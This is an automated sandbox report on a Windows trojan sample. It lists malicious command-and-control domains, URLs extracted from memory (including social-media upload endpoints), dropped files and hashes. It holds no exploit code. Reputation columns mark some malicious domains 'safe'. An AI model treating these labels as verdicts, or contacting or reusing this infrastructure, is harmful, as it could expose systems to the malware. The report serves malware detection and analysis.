https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	0%	Avira URL Cloud	safe
http://61d1a802ff4a46b5.com/	0%	Avira URL Cloud	safe
http://bdc347c728b2d94d.com/X	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/info_old/ddd	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://C431A802FF4A46B5.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com//n7	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/info_old/w:	0%	Avira URL Cloud	safe
http://84B5A35D6E5335EF.com/info_old/ddd	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://55be681fc6760236.com/	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/ll	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/info_old/wx	0%	Avira URL Cloud	safe
http://84B5A35D6E5335EF.com/vx6	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/	0%	Avira URL Cloud	safe
http://www.vb-cable.comVBCABLE	0%	Avira URL Cloud	safe
http://9ed2feea30c3cc5d.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/w.	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://670D67B00237B933.xyz/	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/w	0%	Avira URL Cloud	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	Avira URL Cloud	safe
http://9ED2FEEA30C3CC5D.com/o/	0%	Avira URL Cloud	safe
http://bdcsvchost.exe	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/info_old/ddd	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/o/S6	0%	Avira URL Cloud	safe
http://c43347c728b2d94d.com/	0%	Avira URL Cloud	safe
http://9ED2FEEA30C3CC5D.com/info_old/w)$	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/o/	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/AR	0%	Avira URL Cloud	safe
http://www.vb-cable.com	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/RI	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/b	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/ddd	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/in	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bdc347c728b2d94d.com	unknown	unknown	true	unknown
84b5a35d6e5335ef.com	unknown	unknown	true	unknown
61D53B5A4BC1AB86.com	unknown	unknown	true	unknown
C431A802FF4A46B5.com	unknown	unknown	true	unknown
9ED2FEEA30C3CC5D.com	unknown	unknown	true	unknown
61d53b5a4bc1ab86.com	unknown	unknown	true	unknown
9ed2feea30c3cc5d.com	unknown	unknown	true	unknown
back19e64ea00d6ecfe1.io	unknown	unknown	true	unknown
55BE681FC6760236.com	unknown	unknown	true	unknown
BDC347C728B2D94D.com	unknown	unknown	true	unknown
84B5A35D6E5335EF.com	unknown	unknown	true	unknown
55be681fc6760236.com	unknown	unknown	true	unknown
c431a802ff4a46b5.com	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://back19e64ea00d6ecfe1.io/N	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv5AA4.tmp.11.dr	false		high
http://BDC347C728B2D94D.com/l	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Web Data1618258532140.6.dr	false		high
http://9ED2FEEA30C3CC5D.com/info_old/dddio	26FF190E7AE0F7C7.exe, 00000006.00000003.431133751.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Web Data1618258532140.6.dr	false		high
http://BDC347C728B2D94D.com/g	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://84b5a35d6e5335ef.com/info_old/w	26FF190E7AE0F7C7.exe, 00000007.00000002.368384019.00000000006D1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/e7	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com	ecv5AA4.tmp.11.dr	false		high
http://61D53B5A4BC1AB86.com/info_old/dddmX	26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	1618258522437.exe, 0000000B.00000002.369295802.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://back19e64ea00d6ecfe1.io/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js	ecv5AA4.tmp.11.dr	false		high
https://twitter.com/ookie:	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://BDC347C728B2D94D.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	ecv5AA4.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://twitter.comsec-fetch-dest:	26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	ecv5AA4.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv5AA4.tmp.11.dr	false		high
http://charlesproxy.com/ssl	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354726295.0000000002135000.00000004.00000040.sdmp	false		high
http://61d1a802ff4a46b5.com/	26FF190E7AE0F7C7.exe, 00000007.00000002.368375423.00000000006C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://bdc347c728b2d94d.com/X	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehp	ecv5AA4.tmp.11.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv5AA4.tmp.11.dr	false		high
http://C431A802FF4A46B5.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.432211570.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://C431A802FF4A46B5.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp, SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://BDC347C728B2D94D.com//n7	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9	ecv5AA4.tmp.11.dr	false		high
http://55BE681FC6760236.com/info_old/w:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	1618258522437.exe, 1618258522437.exe.6.dr	false		high
http://84B5A35D6E5335EF.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.433202764.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://55be681fc6760236.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	ecv5AA4.tmp.11.dr	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/ll	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://C431A802FF4A46B5.com/info_old/wx	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.347655574.0000000000790000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	false		high
http://84B5A35D6E5335EF.com/vx6	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_user.dll.6.dr	false		high
http://www.xunlei.com/GET	download_user.dll.6.dr	false		high
http://61D53B5A4BC1AB86.com/	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv5AA4.tmp.11.dr	false		high
http://www.vb-cable.comVBCABLE	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	false	Avira URL Cloud: safe	unknown
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c	ecv5AA4.tmp.11.dr	false		high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://9ed2feea30c3cc5d.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/origin:	26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://back19e64ea00d6ecfe1.io/info_old/w.	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Web Data1618258532140.6.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://670D67B00237B933.xyz/	26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv5AA4.tmp.11.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv5AA4.tmp.11.dr	false		high
http://61D53B5A4BC1AB86.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g	ecv5AA4.tmp.11.dr	false		high
https://contextual.media.net/	ecv5AA4.tmp.11.dr	false		high
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie	ecv5AA4.tmp.11.dr	false		high
https://pki.goog/repository/0	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	ecv5AA4.tmp.11.dr	false	Avira URL Cloud: safe	unknown
http://9ED2FEEA30C3CC5D.com/o/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://bdcsvchost.exe	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340381653.00000000007B4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://55BE681FC6760236.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.435213084.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.twitter.com/1.1/statuses/update.json	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn	ecv5AA4.tmp.11.dr	false		high
http://BDC347C728B2D94D.com/o/S6	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://c43347c728b2d94d.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354348509.0000000000772000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	ecv5AA4.tmp.11.dr	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv5AA4.tmp.11.dr	false		high
http://www.msn.com/	ecv5AA4.tmp.11.dr	false		high
https://upload.twitter.com/i/media/upload.json	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://9ED2FEEA30C3CC5D.com/info_old/w)$	26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/o/	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv5AA4.tmp.11.dr	false		high
https://twitter.com/compose/tweetsec-fetch-mode:	26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://55BE681FC6760236.com/	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false		unknown
http://61D53B5A4BC1AB86.com/AR	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vb-cable.com	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	false	Avira URL Cloud: safe	unknown
http://55BE681FC6760236.com/RI	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/b	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/accept:	26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	false		high
http://back19e64ea00d6ecfe1.io/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv5AA4.tmp.11.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv5AA4.tmp.11.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	ecv5AA4.tmp.11.dr	false	Avira URL Cloud: safe	unknown
http://C431A802FF4A46B5.com/in	26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv5AA4.tmp.11.dr	false		high
https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9	ecv5AA4.tmp.11.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv5AA4.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385405
Start date:	12.04.2021
Start time:	13:14:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 28s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal93.bank.troj.spyw.evad.winEXE@32/37@98/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 58.5% (good quality ratio 55.4%) Quality average: 80.3% Quality standard deviation: 27.5%
HCA Information:	Successful, ratio: 68% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 104.42.151.234, 8.241.78.126, 8.241.78.254, 8.241.80.126, 8.252.5.126, 67.26.139.254, 104.43.193.48, 168.61.161.212, 52.255.188.83, 20.82.210.154, 92.122.213.194, 92.122.213.247, 93.184.221.240, 52.155.217.156, 20.54.26.129, 52.147.198.201, 13.88.21.125, 184.30.24.56 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	tyxCV1ouryr7.exe	Get hash	malicious	Browse
	aOn5CfTiwS.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MSI39DD.tmp	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	tyxCV1ouryr7.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	6MhmlD8KZh.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1618258522328 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
